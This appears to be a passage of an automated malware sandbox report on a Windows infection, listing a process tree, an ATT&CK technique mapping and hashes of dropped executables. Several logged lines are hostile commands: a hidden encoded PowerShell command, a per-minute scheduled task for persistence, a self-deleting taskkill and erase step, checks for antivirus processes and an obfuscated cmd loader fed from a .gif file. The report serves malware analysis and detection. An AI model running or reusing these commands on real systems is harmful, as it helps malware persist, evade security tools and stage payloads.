"C:\Users\Admin\Documents\iJVfcQKzl4GP3F3mI2DUJYcU.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3096

C:\Users\Admin\Documents\kCgCBPutcCX8cCKa9QdPwNw8.exe
"C:\Users\Admin\Documents\kCgCBPutcCX8cCKa9QdPwNw8.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 624
4⤵
- Program crash
PID:4836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 644
4⤵
- Program crash
PID:4116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 620
4⤵
- Program crash
PID:2824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 804
4⤵
- Program crash
PID:1984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 1216
4⤵
- Program crash
PID:4148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 1224
4⤵
- Program crash
- Suspicious use of WriteProcessMemory
PID:4072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 1296
4⤵
- Program crash
PID:4116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 1292
4⤵
- Program crash
PID:1928

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "kCgCBPutcCX8cCKa9QdPwNw8.exe" /f & erase "C:\Users\Admin\Documents\kCgCBPutcCX8cCKa9QdPwNw8.exe" & exit
4⤵
PID:4172

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "kCgCBPutcCX8cCKa9QdPwNw8.exe" /f
5⤵
- Executes dropped EXE
- Kills process with taskkill
PID:1484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 1096
4⤵
- Executes dropped EXE
- Program crash
- Suspicious use of SetWindowsHookEx
PID:2824

C:\Users\Admin\Documents\GauN2MbLc5iG_X1BC9N3DR23.exe
"C:\Users\Admin\Documents\GauN2MbLc5iG_X1BC9N3DR23.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2252

C:\Users\Admin\Documents\GauN2MbLc5iG_X1BC9N3DR23.exe
"C:\Users\Admin\Documents\GauN2MbLc5iG_X1BC9N3DR23.exe"
4⤵
PID:4380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4380 -s 564
5⤵
- Program crash
PID:2588

C:\Users\Admin\Documents\bm3UC6bkNf0IcyjNSCbgK_aX.exe
"C:\Users\Admin\Documents\bm3UC6bkNf0IcyjNSCbgK_aX.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2120

C:\Users\Admin\Documents\k0DbgLakP6JOtlVMKCk6k5oM.exe
"C:\Users\Admin\Documents\k0DbgLakP6JOtlVMKCk6k5oM.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:4396

C:\Users\Admin\Documents\qFlgvqsHls9FEBdgzFtouoSO.exe
"C:\Users\Admin\Documents\qFlgvqsHls9FEBdgzFtouoSO.exe"
3⤵
PID:1484

C:\Users\Admin\Documents\qFlgvqsHls9FEBdgzFtouoSO.exe
C:\Users\Admin\Documents\qFlgvqsHls9FEBdgzFtouoSO.exe
4⤵
PID:2284

C:\Users\Admin\Documents\zGypfgWdUX9FLmVDCvxRTzRI.exe
"C:\Users\Admin\Documents\zGypfgWdUX9FLmVDCvxRTzRI.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1676

C:\Users\Admin\Documents\Z6IPWFE71607m_N3zsjDaINZ.exe
"C:\Users\Admin\Documents\Z6IPWFE71607m_N3zsjDaINZ.exe"
3⤵
PID:2432

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
PID:1564

C:\Users\Admin\Documents\qgrZ4T3Y9t884pwPPSXlbZtd.exe
"C:\Users\Admin\Documents\qgrZ4T3Y9t884pwPPSXlbZtd.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:1244

C:\Users\Admin\Documents\6oLdapnFhYMXw2DVbyOH4oAl.exe
"C:\Users\Admin\Documents\6oLdapnFhYMXw2DVbyOH4oAl.exe"
3⤵
PID:4988

C:\Users\Admin\AppData\Local\Temp\dada.exe
"C:\Users\Admin\AppData\Local\Temp\dada.exe"
4⤵
PID:3928

C:\Users\Admin\AppData\Local\Temp\build.exe
"C:\Users\Admin\AppData\Local\Temp\build.exe"
4⤵
PID:3620

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"
5⤵
- Creates scheduled task(s)
PID:2336

C:\Users\Admin\Documents\vkzPtUWBz7D00uRzLloH3itZ.exe
"C:\Users\Admin\Documents\vkzPtUWBz7D00uRzLloH3itZ.exe"
3⤵
PID:3876

C:\Users\Admin\AppData\Local\Temp\dada.exe
"C:\Users\Admin\AppData\Local\Temp\dada.exe"
4⤵
PID:1980

C:\Users\Admin\AppData\Local\Temp\build.exe
"C:\Users\Admin\AppData\Local\Temp\build.exe"
4⤵
PID:1804

C:\Users\Admin\Documents\f3ILg0ohBDYhwDd8XmudLTXB.exe
"C:\Users\Admin\Documents\f3ILg0ohBDYhwDd8XmudLTXB.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4692

C:\Users\Admin\Documents\w2FHc2yylkVGZ1lS8czTbfK2.exe
"C:\Users\Admin\Documents\w2FHc2yylkVGZ1lS8czTbfK2.exe"
3⤵
PID:2824

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:3984

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4088

C:\Windows\SysWOW64\rundll32.exe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
2⤵
- Loads dropped DLL
PID:3992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 604
3⤵
- Program crash
PID:3864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3992 -ip 3992
1⤵
PID:2000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 460
1⤵
- Program crash
PID:4324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1676 -ip 1676
1⤵
PID:4268

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
1⤵
PID:2096

C:\Windows\SysWOW64\cmd.exe
cmd
2⤵
PID:956

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
3⤵
- Enumerates processes with tasklist
PID:4588

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
3⤵
PID:5104

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
3⤵
- Enumerates processes with tasklist
PID:788

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
3⤵
PID:4248

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
3⤵
PID:2828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 464
1⤵
- Program crash
PID:4084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4424 -ip 4424
1⤵
PID:4540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4692 -ip 4692
1⤵
PID:1200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4692 -ip 4692
1⤵
PID:3656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 468
1⤵
- Program crash
PID:492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2280 -ip 2280
1⤵
PID:1260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4424 -ip 4424
1⤵
PID:4524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1676 -ip 1676
1⤵
PID:4248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 484
1⤵
- Program crash
PID:2588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 2280 -ip 2280
1⤵
PID:4500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4380 -ip 4380
1⤵
PID:2684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4472 -ip 4472
1⤵
PID:3520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2280 -ip 2280
1⤵
PID:4800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1464 -ip 1464
1⤵
PID:4796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 2280 -ip 2280
1⤵
PID:4188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 2208 -ip 2208
1⤵
PID:1884

C:\Windows\SysWOW64\poipslko\iowejrgv.exe
C:\Windows\SysWOW64\poipslko\iowejrgv.exe /d"C:\Users\Admin\Documents\8DS88fSngpzKyrWWNkF0WWfc.exe"
1⤵
PID:4540

C:\Windows\SysWOW64\svchost.exe
svchost.exe
2⤵
PID:4636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 564
2⤵
- Program crash
PID:3568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 2280 -ip 2280
1⤵
PID:5020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4540 -ip 4540
1⤵
PID:3716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4352 -ip 4352
1⤵
PID:2256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2280 -ip 2280
1⤵
PID:4968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2280 -ip 2280
1⤵
- Executes dropped EXE
PID:4988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2280 -ip 2280
1⤵
PID:3632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 2280 -ip 2280
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 4472 -ip 4472
1⤵
PID:2684

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:4840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4472 -ip 4472
1⤵
PID:3612

C:\Users\Admin\AppData\Local\cache\MoUSO.exe
C:\Users\Admin\AppData\Local\cache\MoUSO.exe
1⤵
PID:4372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4472 -ip 4472
1⤵
PID:2744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4472 -ip 4472
1⤵
PID:5044

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5076

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Process Discovery

T1057

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
MD5
54e9306f95f32e50ccd58af19753d929

SHA1
eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

SHA256
45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

SHA512
8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
MD5
909b43dcc0f560813424bb4dfbba7981

SHA1
14f80e8bc573b46dd9ec8b6a1753d19766ac0ed8

SHA256
fb78b10064f304941e5f673fc29bed86d2b1bf2cc80a3b9f1d4990395b41d385

SHA512
afcad9602df431a91a8ecb1964ee97d65d1db602da731fe59d1e6a19d38b65afd646dc3aa134610127337beaaef26ec9507ce8ade751c42f7bc648b325173093

Download Submit
C:\Users\Admin\AppData\Local\Temp\Complete.exe
MD5
92acb4017f38a7ee6c5d2f6ef0d32af2

SHA1
1b932faf564f18ccc63e5dabff5c705ac30a61b8

SHA256
2459694049abfe227ddcf5b4d813fe3ae8e1e9066de5228acf20c958d425c2e1

SHA512
d385b2857d934628e1df3ef493b3a33e2a042c5974d9c153c126a86a28fc61bcc02db0a0791c225378994737a16cd35b74f217600d4b837cda779200c9faeb73

Download Submit
C:\Users\Admin\AppData\Local\Temp\Complete.exe
MD5
92acb4017f38a7ee6c5d2f6ef0d32af2

SHA1
1b932faf564f18ccc63e5dabff5c705ac30a61b8

SHA256
2459694049abfe227ddcf5b4d813fe3ae8e1e9066de5228acf20c958d425c2e1

SHA512
d385b2857d934628e1df3ef493b3a33e2a042c5974d9c153c126a86a28fc61bcc02db0a0791c225378994737a16cd35b74f217600d4b837cda779200c9faeb73

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe
MD5
2d0217e0c70440d8c82883eadea517b9

SHA1
f3b7dd6dbb43b895ba26f67370af99952b7d83cb

SHA256
d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01

SHA512
6d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe
MD5
2d0217e0c70440d8c82883eadea517b9

SHA1
f3b7dd6dbb43b895ba26f67370af99952b7d83cb

SHA256
d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01

SHA512
6d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
MD5
b89068659ca07ab9b39f1c580a6f9d39

SHA1
7e3e246fcf920d1ada06900889d099784fe06aa5

SHA256
9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c

SHA512
940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
MD5
b89068659ca07ab9b39f1c580a6f9d39

SHA1
7e3e246fcf920d1ada06900889d099784fe06aa5

SHA256
9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c

SHA512
940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
MD5
b89068659ca07ab9b39f1c580a6f9d39

SHA1
7e3e246fcf920d1ada06900889d099784fe06aa5

SHA256
9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c

SHA512
940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52

Download Submit
C:\Users\Admin\AppData\Local\Temp\Info.exe
MD5
e9859a3302e5d641fa08639ba20dc6a9

SHA1
0cc1b76de3e82b067a4abc88bb22a528b3897712

SHA256
34bb12486cb58449c1b196109c618257eac5976f48c022ce5e78e93be654e93a

SHA512
03ae0885108f548d7ca9f3eaa14dd2f0e4f0fd7e0b836c4884c9a419702fbdd4a166c099981c4ced287c18988d3cea491b0607aa573589797e8d8d0901990509

Download Submit
C:\Users\Admin\AppData\Local\Temp\Info.exe
MD5
e9859a3302e5d641fa08639ba20dc6a9

SHA1
0cc1b76de3e82b067a4abc88bb22a528b3897712

SHA256
34bb12486cb58449c1b196109c618257eac5976f48c022ce5e78e93be654e93a

SHA512
03ae0885108f548d7ca9f3eaa14dd2f0e4f0fd7e0b836c4884c9a419702fbdd4a166c099981c4ced287c18988d3cea491b0607aa573589797e8d8d0901990509

Download Submit
C:\Users\Admin\AppData\Local\Temp\Info.exe
MD5
e9859a3302e5d641fa08639ba20dc6a9

SHA1
0cc1b76de3e82b067a4abc88bb22a528b3897712

SHA256
34bb12486cb58449c1b196109c618257eac5976f48c022ce5e78e93be654e93a

SHA512
03ae0885108f548d7ca9f3eaa14dd2f0e4f0fd7e0b836c4884c9a419702fbdd4a166c099981c4ced287c18988d3cea491b0607aa573589797e8d8d0901990509

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install.exe
MD5
41b7c6d48d13e1a864bf2d3759e257e6

SHA1
7ee45121a927d744941651bd6673d3df21f1611b

SHA256
820c980f68378170cec0e1f2f4e2e319a07b1d030d7712ece110f579fcd1a8c2

SHA512
0ac230d6ea4f7eaf1c5dbc919e1de41416e4c5e527e0ec583135eab2067d0fcd22615d80a93f803ce327cdbb58b5b236ca47d759647b8c36a98a17a3e1504077

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install.exe
MD5
41b7c6d48d13e1a864bf2d3759e257e6

SHA1
7ee45121a927d744941651bd6673d3df21f1611b

SHA256
820c980f68378170cec0e1f2f4e2e319a07b1d030d7712ece110f579fcd1a8c2

SHA512
0ac230d6ea4f7eaf1c5dbc919e1de41416e4c5e527e0ec583135eab2067d0fcd22615d80a93f803ce327cdbb58b5b236ca47d759647b8c36a98a17a3e1504077

Download Submit
C:\Users\Admin\AppData\Local\Temp\Installation.exe
MD5
eb57ff5452b6ad029e5810b35330ef51

SHA1
6e49b9b0ab48db0ec95d196ecde9c8d567add078

SHA256
ebf4fc866572b4bdce22937bf2e31687b0e2bd8479de68a06452de70a12afbbe

SHA512
3b92269bc803d3d691ad27ea8321736376872aa934e8aaa6ea2e01888e8fc8ce5067d7c940de740365681e62a46977395e03fe1eca21c6031a1cfa8549df1567

Download Submit
C:\Users\Admin\AppData\Local\Temp\Installation.exe
MD5
eb57ff5452b6ad029e5810b35330ef51

SHA1
6e49b9b0ab48db0ec95d196ecde9c8d567add078

SHA256
ebf4fc866572b4bdce22937bf2e31687b0e2bd8479de68a06452de70a12afbbe

SHA512
3b92269bc803d3d691ad27ea8321736376872aa934e8aaa6ea2e01888e8fc8ce5067d7c940de740365681e62a46977395e03fe1eca21c6031a1cfa8549df1567

Download Submit
C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
MD5
9d2bdb9860cbd501ea1907281d138130

SHA1
978abc908a72af3e026eafb9216e3052426e81b4

SHA256
7e2287dc4bdf3b64ef680e566ec1668fa75ab744e1e3891cf801b05c604eeacf

SHA512
9f02a8c513fd1644c959b6cefc5662cd9062496311346f803f2b63780f81925be113a809836be93f16a816296480f1d25e3bf424758ca51391f7057f830b9274

Download Submit
C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
MD5
9d2bdb9860cbd501ea1907281d138130

SHA1
978abc908a72af3e026eafb9216e3052426e81b4

SHA256
7e2287dc4bdf3b64ef680e566ec1668fa75ab744e1e3891cf801b05c604eeacf

SHA512
9f02a8c513fd1644c959b6cefc5662cd9062496311346f803f2b63780f81925be113a809836be93f16a816296480f1d25e3bf424758ca51391f7057f830b9274

Download Submit
C:\Users\Admin\AppData\Local\Temp\axhub.dat
MD5
5fd2eba6df44d23c9e662763009d7f84

SHA1
43530574f8ac455ae263c70cc99550bc60bfa4f1

SHA256
2991e2231855661e94ef80a4202487a9d7dc7bebccab9a0b2a786cf0783a051f

SHA512
321a86725e533dedb5b74e17218e6e53a49fa6ffc87d7f7da0f0b8441a081fe785f7846a76f67ef03ec3abddacbe8906b20a2f3ce8178896ec57090ef7ab0eb7

Download Submit
C:\Users\Admin\AppData\Local\Temp\axhub.dll
MD5
1c7be730bdc4833afb7117d48c3fd513

SHA1
dc7e38cfe2ae4a117922306aead5a7544af646b8

SHA256
8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

SHA512
7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\axhub.dll
MD5
1c7be730bdc4833afb7117d48c3fd513

SHA1
dc7e38cfe2ae4a117922306aead5a7544af646b8

SHA256
8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

SHA512
7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
MD5
622fba37304dd8de693e4a029fd97724

SHA1
de3f15351fda6734351d13f4ee5f5c532b01d700

SHA256
f1aff783390bb1006acc74fd0384a9e7162a1792041030c2f8b92557f53360c8

SHA512
99f03eb4a97c04bd7619afdc9daa1944f99081e0ebbb7d50d4ed0c82efc1cc5d8804a4db2d1673aa3c014d6aba6026312df9ab8ee5306abfc16b853f50aadd80

Download Submit
C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
MD5
b7161c0845a64ff6d7345b67ff97f3b0

SHA1
d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

SHA256
fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

SHA512
98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

Download Submit
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
7fee8223d6e4f82d6cd115a28f0b6d58

SHA1
1b89c25f25253df23426bd9ff6c9208f1202f58b

SHA256
a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

SHA512
3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

Download Submit
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
7fee8223d6e4f82d6cd115a28f0b6d58

SHA1
1b89c25f25253df23426bd9ff6c9208f1202f58b

SHA256
a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

SHA512
3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

Download Submit
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
a6279ec92ff948760ce53bba817d6a77

SHA1
5345505e12f9e4c6d569a226d50e71b5a572dce2

SHA256
8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181

SHA512
213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
a6279ec92ff948760ce53bba817d6a77

SHA1
5345505e12f9e4c6d569a226d50e71b5a572dce2

SHA256
8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181

SHA512
213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
MD5
9b55bffb97ebd2c51834c415982957b4

SHA1
728262abdfc4f0e8a84eb3b5cd2be9ea9d0acc16

SHA256
a62cee3d2610ed0f693179838803e5c60dcd4f68028c60f5761b90c750125e11

SHA512
4fa9d641aba15fd07a0711530ab1f1a4e8dbafe03e1ab71845bcdcd0a1efa9e59a05915834c5c717beada659dd5ee459aa7e08b4b0acc8f867ace07430eb11f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
MD5
9b55bffb97ebd2c51834c415982957b4

SHA1
728262abdfc4f0e8a84eb3b5cd2be9ea9d0acc16

SHA256
a62cee3d2610ed0f693179838803e5c60dcd4f68028c60f5761b90c750125e11

SHA512
4fa9d641aba15fd07a0711530ab1f1a4e8dbafe03e1ab71845bcdcd0a1efa9e59a05915834c5c717beada659dd5ee459aa7e08b4b0acc8f867ace07430eb11f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\mysetold.exe
MD5
96cf21aab98bc02dbc797e9d15ad4170

SHA1
86107ee6defd4fd8656187b2ebcbd58168639579

SHA256
35d3aec171b80d770f671e626024482017c5f4831208aa42032cea4c55983caf

SHA512
d0543a570376c198a326ff8c143f9de0b8e42b1bff5eb2f65e4307f144fe60ecf5987c72ae9819bafe5cb1207f3fbb81c05a5e48d85867f7438c5dfe70eb4a65

Download Submit
C:\Users\Admin\AppData\Local\Temp\mysetold.exe
MD5
96cf21aab98bc02dbc797e9d15ad4170

SHA1
86107ee6defd4fd8656187b2ebcbd58168639579

SHA256
35d3aec171b80d770f671e626024482017c5f4831208aa42032cea4c55983caf

SHA512
d0543a570376c198a326ff8c143f9de0b8e42b1bff5eb2f65e4307f144fe60ecf5987c72ae9819bafe5cb1207f3fbb81c05a5e48d85867f7438c5dfe70eb4a65

Download Submit
C:\Users\Admin\AppData\Local\Temp\pub2.exe
MD5
6d6855bacbd2fcc9a57f26d9c48fe4f1

SHA1
c5eef63c2bfde59cce24d9c237e358919561ccc4

SHA256
45d2a1f040dbe36caeb976b6076d8986f60733a616ffca8347dfa945663dc4e8

SHA512
48198d795db8060284b5518512b948de3178e18256a9bd56513d2a181b9dc935c272df8349970ab1feb8efa10bf69cf8018fbd4fd45341ccda7677ff0547ec7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\pub2.exe
MD5
6d6855bacbd2fcc9a57f26d9c48fe4f1

SHA1
c5eef63c2bfde59cce24d9c237e358919561ccc4

SHA256
45d2a1f040dbe36caeb976b6076d8986f60733a616ffca8347dfa945663dc4e8

SHA512
48198d795db8060284b5518512b948de3178e18256a9bd56513d2a181b9dc935c272df8349970ab1feb8efa10bf69cf8018fbd4fd45341ccda7677ff0547ec7e

Download Submit
